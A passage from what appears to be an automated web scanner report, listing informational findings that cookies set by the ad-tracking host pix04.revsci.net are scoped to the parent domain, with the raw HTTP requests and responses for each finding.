udm_0=MLvvNSMJaSpn3g1FqK/M1tETBwjhcml+EUUEtK6yNGSqLiDCeuaOwCdn3ykESL2mlL4dRrGvgwGgA/A4wJhlMC1vGBHYH+piW0XAwg9DcnN53XJuAmPgLPUIdW73WQWjJa6Io7aF0ZztmuyDxoiaNXO78N0IKzTCXsu51UgBzDkNTVWGUCmrxS3xQxge+ajURR+9tQn6XGkPraRgyS/2qSJb6KasYM+PBQF/fnNrRJ+1YMbgbf/fGWeAfdKPaDOKuWWMhppmS9Gn+86ZS9A+Tj7idxuBK4f3eHIg5lwRIV9+Rciloep7qOs3YJaM+43hqOReYOFVGRCK761BI26eOgR8aOwRpq+gSBGr4TFG76PjouQk5SdjhoDlzcozamCm7dWyzZA5aV3F8pJI9oEj7Y34e6jrH+sH4X6cgLRPGVzygzxeEKoQF63G0yvAf1/H65Y6USqskyQWWmVcuQW1erC/3efOIEiYUnaIKjufXFkf/PqJATnufwfQrq2UJCM6lUsbhsDq6f8r54Qnh9JuUonT8B4Zw3oFGasFbvzEv57TW9KWKmHnto2BSWD9cV2Otk9KWIWuaJHlKDpIUBuGLn7/uROkqQVzzSclX/nUgHUOrCfo3fqAvpHpUuLnZG9s1PNgXLc2MeyzyKkIBz0KrsWty+9ghl26TxP52Ul7mQRehdLHEkptm6fsTx9G1LafjvhZZEFhsimD93nnoY9r/Q36TdhBG+MA/PpgD3Chid8SE4eyywyl+5lFxrlGW4RBegZXURl1kWo/78KThoVufCjQmqG6Xp35g74/qNwPxVJsbud4fsD5o35i7gg2ZFNHKI7/r1LI52jFGAdT0aEgQhSdLdfnh9H9i3AjaVMWrtfJJkKNeuTcphsfNW9syuXqHhRDxNC0X61orwTzvsgIC8nl6p6uNVLRtB8Gl+KzonY0Be+xOKvGKd0aD0DyL7y/59bdSwc7g2mGJYf053RRsmzTingu0XJxl2B2nVEs/swNyIy2x3WbqstR7+ZlwrQlEMOg8AKIlQKE1FXv0V5dGtMm8AUM7Pw8+98tHDbnv9+8sYa4FxCbW8zMDoByU79D+ia7i+c8N9TIFov4ZXubk4PbB2qcKdfUi1sh2Uzl4cLveQPoM8lI+p+rxhE4CBhLrjkDHi8MGoV59NAniO37qOwnnOla69kxzmh/eamK1lfb46jRIo18T8lC/p+Vu4GNXp3aVPKqlJiXT68Yfv8Ru77NjGDhOnWTYvg2d3E=

Response

11.193. http://pix04.revsci.net/F08747/b3/0/3/1003161/725558049.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/725558049.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCl6CzycM1VkQna+w=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:07 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e649b&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:07 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/725558049.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXSkPATW+Mer9duzVms/XJMQ; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCl6CzycM1VkQna+w=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:07 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e649b&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:07 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:39:07 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.194. http://pix04.revsci.net/F08747/b3/0/3/1003161/737191144.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/737191144.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw69OD9uCTaGM1VkQLa+w=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:23 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b3&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:23 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/737191144.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXakvIXV+cer9duzVms/DJMc; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw69OD9uCTaGM1VkQLa+w=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:23 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b3&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:23 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 19:21:22 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.195. http://pix04.revsci.net/F08747/b3/0/3/1003161/769036262.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/769036262.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw69OD9iDTSKI0VkTwa+w=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:25 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b5&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:25 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/769036262.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXakvIXV+cer9duzVms/DJMc; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw69OD9iDTSKI0VkTwa+w=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:25 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b5&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:25 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 19:21:25 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.196. http://pix04.revsci.net/F08747/b3/0/3/1003161/814275397.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/814275397.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw69OD9uDSSaM0VkQaa9E=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:22 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b2&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:22 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/814275397.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXakvIXV+cer9duzVms/DJMc; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; 